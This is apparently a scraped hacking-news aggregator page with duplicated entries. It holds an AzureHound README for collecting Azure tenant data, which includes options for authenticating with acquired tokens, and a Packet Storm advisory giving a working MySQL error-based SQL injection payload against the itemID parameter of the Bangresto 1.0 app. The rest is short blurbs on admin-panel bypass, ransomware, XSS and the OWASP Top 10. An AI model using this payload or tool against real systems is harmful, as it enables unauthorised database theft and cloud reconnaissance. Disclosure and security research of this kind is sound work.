Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
AzureHound - Azure Data Exporter For BloodHound
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxH4ORvtpJZLry3tPrOdrXtg4IZ3wKmD5jgL1MF4dFmYha42IOKeYVKJFGtwOoacaOZreL3-rixcCank0fW1cBhkwYCBGBO00xJ7-dzulegHFExvvqvhbDjFhutjk13ODp8rcqFlsXFwNPXbJH8qW1PZ0ZM3W6_54t9Jq7o6Lkm7UFPK6g-_1PVUgQbw/w640-h480/azure.jpg
The BloodHound data collector for Microsoft Azure
Get AzureHound
Release Binaries
Download the appropriate binary for your platform from one of our Releases.
Rolling Release
The rolling release contains pre-built binaries that are automatically kept up-to-date with the
Warning: The rolling release may be unstable.
Compiling
Prerequisites
* Go 1.18 or later
To build this project from source run the following:
Usage
Quickstart
Print all Azure Tenant data to stdout
Print all Azure Tenant data to file
Configure and start data collection service for BloodHound Enterprise
CLI
Download AzureHound
AzureHound - Azure Data Exporter For BloodHound
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxH4ORvtpJZLry3tPrOdrXtg4IZ3wKmD5jgL1MF4dFmYha42IOKeYVKJFGtwOoacaOZreL3-rixcCank0fW1cBhkwYCBGBO00xJ7-dzulegHFExvvqvhbDjFhutjk13ODp8rcqFlsXFwNPXbJH8qW1PZ0ZM3W6_54t9Jq7o6Lkm7UFPK6g-_1PVUgQbw/w640-h480/azure.jpg
The BloodHound data collector for Microsoft Azure
Get AzureHound
Release Binaries
Download the appropriate binary for your platform from one of our Releases.
Rolling Release
The rolling release contains pre-built binaries that are automatically kept up-to-date with the
mainbranch and can be downloaded from here.Warning: The rolling release may be unstable.
Compiling
Prerequisites
* Go 1.18 or later
To build this project from source run the following:
go build -ldflags="-s -w -X github.com/bloodhoundad/azurehound/constants.Version=`git describe tags --exact-match 2> /dev/null || git rev-parse HEAD`"Usage
Quickstart
Print all Azure Tenant data to stdout
❯ azurehound list -u "$USERNAME" -p "$PASSWORD" -t "$TENANT"Print all Azure Tenant data to file
❯ azurehound list -u "$USERNAME" -p "$PASSWORD" -t "$TENANT" -o "mytenant.json"Configure and start data collection service for BloodHound Enterprise
❯ azurehound configure
(follow prompts)
❯ azurehound startCLI
❯ azurehound --help
AzureHound vx.x.x
Created by the BloodHound Enterprise team - https://bloodhoundenterprise.io
The official tool for collecting Azure data for BloodHound and BloodHound Enterprise
Usage:
azurehound [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
configure Configure AzureHound
help Help about any command
list Lists Azure Objects
start Start Azure data collection service for BloodHound Enterprise
Flags:
-c, --config string AzureHound configuration file (default: /Users/dlees/.config/azurehound/config.json)
-h, --help help for azurehound
--json Output logs as json
-j, --jwt string Use an acquired JWT to authenticate into Azure
--log- file string Output logs to this file
--proxy string Sets the proxy URL for the AzureHound service
-r, --refresh-token string Use an acquired refresh token to authenticate into Azure
-v, --verbosity int AzureHound verbosity level (defaults to 0) [Min: -1, Max: 2]
--version version for azurehound
Use "azurehound [command] --help" for more information about a command.
Download AzureHound
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Bangresta 1.0 SQL Injection
https://4.bp.blogspot.com/-42b-8Yu8ql4/WWlvfoDuyhI/AAAAAAAAIQE/GMGQD7Uo7DMncRccI_LNcWgfvYRkd0zwQCLcBGAs/s1600/h86.png
Bangresta version 1.0 suffers from a remote SQL injection vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
Bangresta 1.0 SQL Injection
https://4.bp.blogspot.com/-42b-8Yu8ql4/WWlvfoDuyhI/AAAAAAAAIQE/GMGQD7Uo7DMncRccI_LNcWgfvYRkd0zwQCLcBGAs/s1600/h86.png
Bangresta version 1.0 suffers from a remote SQL injection vulnerability.
SHA-256 |
6e637787eb6b3ed2d785900a186d5cd5989d7cf6482606330db770e979bcd9abDownload
## Title: Bangresto 1.0 SQLi
## Author: nu11secur1ty
## Date: 12.16.2022
## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
## Demo: https://axcora.my.id/bangrestoapp/start.php
## Software: https://github.com/mesinkasir/bangresto
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto
## Description:
The `itemID` parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the itemID parameter, and a database
error message was returned.
The attacker can be stooling all information from the database of this
application.
## STATUS: CRITICAL Vulnerability
[+] Payload:
```MySQL
---
Parameter: itemID (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT
(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)
## Proof and Exploit:
[href](https://streamable.com/moapnd)
## Time spent
`00:30:00`
Source:packetstormsecurity.com
Bypass Admin Panel Using Google & fetch all Users Data [Data Breach]
https://medium.com/@NiGHt.Hunter.101/bypass-admin-panel-using-google-fetch-all-users-data-data-breach-886b8e8eb360?source=rss------bug_bounty-5
https://medium.com/@NiGHt.Hunter.101/bypass-admin-panel-using-google-fetch-all-users-data-data-breach-886b8e8eb360?source=rss------bug_bounty-5
How i was able to bypass the admin panel using google dorks by having access to authenticated endpoints and access to all P1 user's infoContinue reading on Medium » (https://medium.com/@NiGHt.Hunter.101/bypass-admin-panel-using-google-fetch-all-users-data-data-breach-886b8e8eb360?source=rss------bug_bounty-5)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
2022 was the year of crippling ransomware attacks on small countries
https://cdn-images-1.medium.com/max/1400/1*nEojOyjg3W2wTIWk3x__mQ.png
Vanuatu is the latest victim in a string of crippling ransomware attacks on small countries this year.
Continue reading on README_ »
2022 was the year of crippling ransomware attacks on small countries
https://cdn-images-1.medium.com/max/1400/1*nEojOyjg3W2wTIWk3x__mQ.png
Vanuatu is the latest victim in a string of crippling ransomware attacks on small countries this year.
Continue reading on README_ »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
8 Ways to Improve Your Website Security
https://cdn-images-1.medium.com/max/1024/1*a41QCTDvsYNqSfQvmtii7g.png
A critical component of any web design is website security. While cyberattacks on your website are inevitable, without the proper security…
Continue reading on Medium »
8 Ways to Improve Your Website Security
https://cdn-images-1.medium.com/max/1024/1*a41QCTDvsYNqSfQvmtii7g.png
A critical component of any web design is website security. While cyberattacks on your website are inevitable, without the proper security…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What Is The OWASP TOP 10?
The OWASP Top 10 is a list of the most common web security vulnerabilities, as determined by the Open Web Application Security Project…
Continue reading on Medium »
What Is The OWASP TOP 10?
The OWASP Top 10 is a list of the most common web security vulnerabilities, as determined by the Open Web Application Security Project…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What Is XSS?
Cross-Site Scripting (XSS) is a type of web security vulnerability that allows an attacker to inject malicious code into a website or web…
Continue reading on Medium »
What Is XSS?
Cross-Site Scripting (XSS) is a type of web security vulnerability that allows an attacker to inject malicious code into a website or web…
Continue reading on Medium »